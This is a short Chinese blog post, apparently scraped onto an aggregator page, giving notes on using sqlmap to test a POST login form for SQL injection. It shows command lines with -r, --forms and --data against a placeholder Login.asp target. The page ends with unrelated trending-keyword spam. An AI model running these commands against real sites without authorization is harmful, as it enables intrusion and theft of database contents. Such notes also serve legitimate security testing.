SQLMAP渗透笔记之POST登陆框注入

来源:互联网 发布:成都网络视听大会盛典 编辑:程序博客网 时间:2024/05/16 10:14


                         氷刀's Blog




---------------------------------------------------------------------------------------------


                SQLMAP渗透笔记之POST登陆框注入


                          
---------------------------------------------------------------------------------------------


1.burpsuite + sqlmap
利用burpsuite抓包保存为txt,利用sqlmap指定文本注入(此方法本人未实战过,是很普遍的方法,详情请自行百度)




注入点:http://www.xx.com/Login.asp
sqlmap.py -r test.txt -p Password 






2.自动注册表单,截取数据。(直接在后面加[--forms])


sqlmap -u "http://www.xx.com/Login.asp" --forms




3.指定参数


sqlmap.py -u "http://www.xx.com/Login.asp" --data "标签名1=数据1&标签名2=数据2&标签名3=数据3..." 


注:填写的数据可以随意写,但标签名一定要与input标签中的name一致,不同的标签名对应不同的name


sqlmap -u "http://www.xx.com/Login.asp" --data "Username=1&Password=1"


注:Username与Password分别为Login.asp页面中的两个输入框的名字,将鼠标移动到输入框上面右击选择“审查元素”即可看到,每台网页的Login页面都不一定是一样的,渗透老鸟应该很容易懂。本人不才,可能解释的不太清楚。
阅读全文
'); })();
0 0
原创粉丝点击
热门IT博客
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 抖音张曼如是真的假的 张月 张月印 张朋 张朋起 张望 张望近义词 张望的意思 什么地张望 踮脚张望 张望的近义词 张望的反义词 张朝 张末 张本智 张本煜 张本 张本天杰 张本羲 王楚钦胜张本智和 张本宇和中国矛盾 张本智和为什么被讨厌 日本人评价张本智和 张本智和不准回中国 张本智和一家有多恨中国 张本智和父母 张本智和为什么改国籍 孙闻横扫张本智和 张本智和的父母是谁 张本智和怎么看待中国 张本煜退出万合天宜 林高远输给张本智和 张权 张权破痛油 张村 张村镇 上张村 张杨果 张杨果而 张杨 张杨智子